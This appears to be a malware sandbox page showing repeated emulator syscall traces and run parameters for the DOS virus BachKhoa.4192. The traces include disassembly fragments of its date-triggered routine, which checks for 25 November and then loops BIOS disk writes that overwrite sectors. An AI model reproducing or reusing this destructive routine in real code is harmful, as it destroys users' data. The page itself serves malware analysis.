Sample viewer

vx.netlux.org/Virus.DOS.BachKhoa.4192

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T23:10:51.567565027Z	42	PC: 14866 \| Get date 0x14866: cmp dx, 0xb19 0x1486a: jne 0x1488d 0x1486c: mov dx, 0x180 0x1486f: mov cx, 2 0x14872: mov ax, 0x30a 0x14875: xor bx, bx 0x14877: push cx 0x14878: push dx 0x14879: int 0x13 0x1487b: pop dx 0x1487c: pop cx 0x1487d: inc ch 0x1487f: cmp ch, 0xc8 0x14882: jb 0x14872 0x14884: xor ch, ch 0x14886: inc dh 0x14888: cmp dh, 0x3c 0x1488b: jb 0x14872 0x1488d: mov ah, 0x2b 0x1488f: popf
2018-12-17T23:10:51.571208397Z	43	PC: 148a2 \| Set date
2018-12-17T23:10:51.852693088Z	42	PC: 13a05 \| Get date 0x13a05: and dx, 0xffc0 0x13a08: mov word ptr cs:[0xda2], dx 0x13a0d: mov word ptr cs:[0xdbc], dx 0x13a12: mov word ptr cs:[0xab5], dx 0x13a17: mov word ptr cs:[0x2fa], 0 0x13a1e: mov word ptr [0x1194], ss 0x13a22: mov word ptr [0x1196], sp 0x13a26: add word ptr cs:[0x2e6], 1 0x13a2c: mov ax, cs 0x13a2e: mov es, ax 0x13a30: mov ds, ax 0x13a32: mov bx, 0x107b 0x13a35: mov dx, 0x11de 0x13a38: mov ax, 0x4b00 0x13a3b: pushf 0x13a3c: lcall ptr [0x2f2] 0x13a40: cli 0x13a41: mov ss, word ptr cs:[0x1194] 0x13a46: mov sp, word ptr cs:[0x1196] 0x13a4b: mov ax, cs
2018-12-17T23:10:51.871619077Z	42	PC: 15b46 \| Get date 0x15b46: cmp dx, 0xb19 0x15b4a: jne 0x15b6d 0x15b4c: mov dx, 0x180 0x15b4f: mov cx, 2 0x15b52: mov ax, 0x30a 0x15b55: xor bx, bx 0x15b57: push cx 0x15b58: push dx 0x15b59: int 0x13 0x15b5b: pop dx 0x15b5c: pop cx 0x15b5d: inc ch 0x15b5f: cmp ch, 0xc8 0x15b62: jb 0x15b52 0x15b64: xor ch, ch 0x15b66: inc dh 0x15b68: cmp dh, 0x3c 0x15b6b: jb 0x15b52 0x15b6d: mov ah, 0x2b 0x15b6f: popf
2018-12-17T23:10:51.875671105Z	43	PC: 15b82 \| Set date
2018-12-17T23:10:51.877056475Z	9	PC: 13d3c \| Display string (Could not find end pointer)
2018-12-17T23:10:51.883568014Z	76	PC: 13d41 \| Terminate with return code (Return code = '0')
2018-12-17T23:10:51.888003837Z	77	PC: 13a55 \| Get program return code

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16996,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:54:36.953188543Z	42	PC: 14866 \| Get date 0x14866: cmp dx, 0xb19 0x1486a: jne 0x1488d 0x1486c: mov dx, 0x180 0x1486f: mov cx, 2 0x14872: mov ax, 0x30a 0x14875: xor bx, bx 0x14877: push cx 0x14878: push dx 0x14879: int 0x13 0x1487b: pop dx 0x1487c: pop cx 0x1487d: inc ch 0x1487f: cmp ch, 0xc8 0x14882: jb 0x14872 0x14884: xor ch, ch 0x14886: inc dh 0x14888: cmp dh, 0x3c 0x1488b: jb 0x14872 0x1488d: mov ah, 0x2b 0x1488f: popf
2018-12-25T12:54:36.955036002Z	43	PC: 148a2 \| Set date
2018-12-25T12:54:37.091122805Z	42	PC: 13a05 \| Get date 0x13a05: and dx, 0xffc0 0x13a08: mov word ptr cs:[0xda2], dx 0x13a0d: mov word ptr cs:[0xdbc], dx 0x13a12: mov word ptr cs:[0xab5], dx 0x13a17: mov word ptr cs:[0x2fa], 0 0x13a1e: mov word ptr [0x1194], ss 0x13a22: mov word ptr [0x1196], sp 0x13a26: add word ptr cs:[0x2e6], 1 0x13a2c: mov ax, cs 0x13a2e: mov es, ax 0x13a30: mov ds, ax 0x13a32: mov bx, 0x107b 0x13a35: mov dx, 0x11de 0x13a38: mov ax, 0x4b00 0x13a3b: pushf 0x13a3c: lcall ptr [0x2f2] 0x13a40: cli 0x13a41: mov ss, word ptr cs:[0x1194] 0x13a46: mov sp, word ptr cs:[0x1196] 0x13a4b: mov ax, cs
2018-12-25T12:54:37.106926083Z	42	PC: 15b46 \| Get date 0x15b46: cmp dx, 0xb19 0x15b4a: jne 0x15b6d 0x15b4c: mov dx, 0x180 0x15b4f: mov cx, 2 0x15b52: mov ax, 0x30a 0x15b55: xor bx, bx 0x15b57: push cx 0x15b58: push dx 0x15b59: int 0x13 0x15b5b: pop dx 0x15b5c: pop cx 0x15b5d: inc ch 0x15b5f: cmp ch, 0xc8 0x15b62: jb 0x15b52 0x15b64: xor ch, ch 0x15b66: inc dh 0x15b68: cmp dh, 0x3c 0x15b6b: jb 0x15b52 0x15b6d: mov ah, 0x2b 0x15b6f: popf
2018-12-25T12:54:37.109966987Z	43	PC: 15b82 \| Set date
2018-12-25T12:54:37.11104745Z	9	PC: 13d3c \| Display string (Could not find end pointer)
2018-12-25T12:54:37.116442211Z	76	PC: 13d41 \| Terminate with return code (Return code = '0')
2018-12-25T12:54:37.120157427Z	77	PC: 13a55 \| Get program return code

{"DateBased":true,"Day":25,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16996,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:54:36.929491948Z	42	PC: 14866 \| Get date 0x14866: cmp dx, 0xb19 0x1486a: jne 0x1488d 0x1486c: mov dx, 0x180 0x1486f: mov cx, 2 0x14872: mov ax, 0x30a 0x14875: xor bx, bx 0x14877: push cx 0x14878: push dx 0x14879: int 0x13 0x1487b: pop dx 0x1487c: pop cx 0x1487d: inc ch 0x1487f: cmp ch, 0xc8 0x14882: jb 0x14872 0x14884: xor ch, ch 0x14886: inc dh 0x14888: cmp dh, 0x3c 0x1488b: jb 0x14872 0x1488d: mov ah, 0x2b 0x1488f: popf
2018-12-25T12:54:39.676765389Z	43	PC: 148a2 \| Set date
2018-12-25T12:54:39.935174724Z	42	PC: 13a05 \| Get date 0x13a05: and dx, 0xffc0 0x13a08: mov word ptr cs:[0xda2], dx 0x13a0d: mov word ptr cs:[0xdbc], dx 0x13a12: mov word ptr cs:[0xab5], dx 0x13a17: mov word ptr cs:[0x2fa], 0 0x13a1e: mov word ptr [0x1194], ss 0x13a22: mov word ptr [0x1196], sp 0x13a26: add word ptr cs:[0x2e6], 1 0x13a2c: mov ax, cs 0x13a2e: mov es, ax 0x13a30: mov ds, ax 0x13a32: mov bx, 0x107b 0x13a35: mov dx, 0x11de 0x13a38: mov ax, 0x4b00 0x13a3b: pushf 0x13a3c: lcall ptr [0x2f2] 0x13a40: cli 0x13a41: mov ss, word ptr cs:[0x1194] 0x13a46: mov sp, word ptr cs:[0x1196] 0x13a4b: mov ax, cs
2018-12-25T12:54:39.956935717Z	42	PC: 15b46 \| Get date 0x15b46: cmp dx, 0xb19 0x15b4a: jne 0x15b6d 0x15b4c: mov dx, 0x180 0x15b4f: mov cx, 2 0x15b52: mov ax, 0x30a 0x15b55: xor bx, bx 0x15b57: push cx 0x15b58: push dx 0x15b59: int 0x13 0x15b5b: pop dx 0x15b5c: pop cx 0x15b5d: inc ch 0x15b5f: cmp ch, 0xc8 0x15b62: jb 0x15b52 0x15b64: xor ch, ch 0x15b66: inc dh 0x15b68: cmp dh, 0x3c 0x15b6b: jb 0x15b52 0x15b6d: mov ah, 0x2b 0x15b6f: popf
2018-12-25T12:54:42.373330419Z	43	PC: 15b82 \| Set date
2018-12-25T12:54:42.375520334Z	9	PC: 13d3c \| Display string (Could not find end pointer)
2018-12-25T12:54:42.388499788Z	76	PC: 13d41 \| Terminate with return code (Return code = '0')
2018-12-25T12:54:42.400585545Z	77	PC: 13a55 \| Get program return code

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16996,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:54:37.228071067Z	42	PC: 14866 \| Get date 0x14866: cmp dx, 0xb19 0x1486a: jne 0x1488d 0x1486c: mov dx, 0x180 0x1486f: mov cx, 2 0x14872: mov ax, 0x30a 0x14875: xor bx, bx 0x14877: push cx 0x14878: push dx 0x14879: int 0x13 0x1487b: pop dx 0x1487c: pop cx 0x1487d: inc ch 0x1487f: cmp ch, 0xc8 0x14882: jb 0x14872 0x14884: xor ch, ch 0x14886: inc dh 0x14888: cmp dh, 0x3c 0x1488b: jb 0x14872 0x1488d: mov ah, 0x2b 0x1488f: popf
2018-12-25T12:54:37.232459146Z	43	PC: 148a2 \| Set date
2018-12-25T12:54:37.514997715Z	42	PC: 13a05 \| Get date 0x13a05: and dx, 0xffc0 0x13a08: mov word ptr cs:[0xda2], dx 0x13a0d: mov word ptr cs:[0xdbc], dx 0x13a12: mov word ptr cs:[0xab5], dx 0x13a17: mov word ptr cs:[0x2fa], 0 0x13a1e: mov word ptr [0x1194], ss 0x13a22: mov word ptr [0x1196], sp 0x13a26: add word ptr cs:[0x2e6], 1 0x13a2c: mov ax, cs 0x13a2e: mov es, ax 0x13a30: mov ds, ax 0x13a32: mov bx, 0x107b 0x13a35: mov dx, 0x11de 0x13a38: mov ax, 0x4b00 0x13a3b: pushf 0x13a3c: lcall ptr [0x2f2] 0x13a40: cli 0x13a41: mov ss, word ptr cs:[0x1194] 0x13a46: mov sp, word ptr cs:[0x1196] 0x13a4b: mov ax, cs
2018-12-25T12:54:37.534094646Z	42	PC: 15b46 \| Get date 0x15b46: cmp dx, 0xb19 0x15b4a: jne 0x15b6d 0x15b4c: mov dx, 0x180 0x15b4f: mov cx, 2 0x15b52: mov ax, 0x30a 0x15b55: xor bx, bx 0x15b57: push cx 0x15b58: push dx 0x15b59: int 0x13 0x15b5b: pop dx 0x15b5c: pop cx 0x15b5d: inc ch 0x15b5f: cmp ch, 0xc8 0x15b62: jb 0x15b52 0x15b64: xor ch, ch 0x15b66: inc dh 0x15b68: cmp dh, 0x3c 0x15b6b: jb 0x15b52 0x15b6d: mov ah, 0x2b 0x15b6f: popf
2018-12-25T12:54:37.536859735Z	43	PC: 15b82 \| Set date
2018-12-25T12:54:37.538657245Z	9	PC: 13d3c \| Display string (Could not find end pointer)
2018-12-25T12:54:37.545305736Z	76	PC: 13d41 \| Terminate with return code (Return code = '0')
2018-12-25T12:54:37.549957266Z	77	PC: 13a55 \| Get program return code

{"DateBased":true,"Day":25,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16996,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:54:37.629238045Z	42	PC: 14866 \| Get date 0x14866: cmp dx, 0xb19 0x1486a: jne 0x1488d 0x1486c: mov dx, 0x180 0x1486f: mov cx, 2 0x14872: mov ax, 0x30a 0x14875: xor bx, bx 0x14877: push cx 0x14878: push dx 0x14879: int 0x13 0x1487b: pop dx 0x1487c: pop cx 0x1487d: inc ch 0x1487f: cmp ch, 0xc8 0x14882: jb 0x14872 0x14884: xor ch, ch 0x14886: inc dh 0x14888: cmp dh, 0x3c 0x1488b: jb 0x14872 0x1488d: mov ah, 0x2b 0x1488f: popf
2018-12-25T12:54:39.675682317Z	43	PC: 148a2 \| Set date
2018-12-25T12:54:39.946569929Z	42	PC: 13a05 \| Get date 0x13a05: and dx, 0xffc0 0x13a08: mov word ptr cs:[0xda2], dx 0x13a0d: mov word ptr cs:[0xdbc], dx 0x13a12: mov word ptr cs:[0xab5], dx 0x13a17: mov word ptr cs:[0x2fa], 0 0x13a1e: mov word ptr [0x1194], ss 0x13a22: mov word ptr [0x1196], sp 0x13a26: add word ptr cs:[0x2e6], 1 0x13a2c: mov ax, cs 0x13a2e: mov es, ax 0x13a30: mov ds, ax 0x13a32: mov bx, 0x107b 0x13a35: mov dx, 0x11de 0x13a38: mov ax, 0x4b00 0x13a3b: pushf 0x13a3c: lcall ptr [0x2f2] 0x13a40: cli 0x13a41: mov ss, word ptr cs:[0x1194] 0x13a46: mov sp, word ptr cs:[0x1196] 0x13a4b: mov ax, cs
2018-12-25T12:54:39.965380396Z	42	PC: 15b46 \| Get date 0x15b46: cmp dx, 0xb19 0x15b4a: jne 0x15b6d 0x15b4c: mov dx, 0x180 0x15b4f: mov cx, 2 0x15b52: mov ax, 0x30a 0x15b55: xor bx, bx 0x15b57: push cx 0x15b58: push dx 0x15b59: int 0x13 0x15b5b: pop dx 0x15b5c: pop cx 0x15b5d: inc ch 0x15b5f: cmp ch, 0xc8 0x15b62: jb 0x15b52 0x15b64: xor ch, ch 0x15b66: inc dh 0x15b68: cmp dh, 0x3c 0x15b6b: jb 0x15b52 0x15b6d: mov ah, 0x2b 0x15b6f: popf
2018-12-25T12:54:42.250309919Z	43	PC: 15b82 \| Set date
2018-12-25T12:54:42.25175922Z	9	PC: 13d3c \| Display string (Could not find end pointer)
2018-12-25T12:54:42.255852323Z	76	PC: 13d41 \| Terminate with return code (Return code = '0')
2018-12-25T12:54:42.258528641Z	77	PC: 13a55 \| Get program return code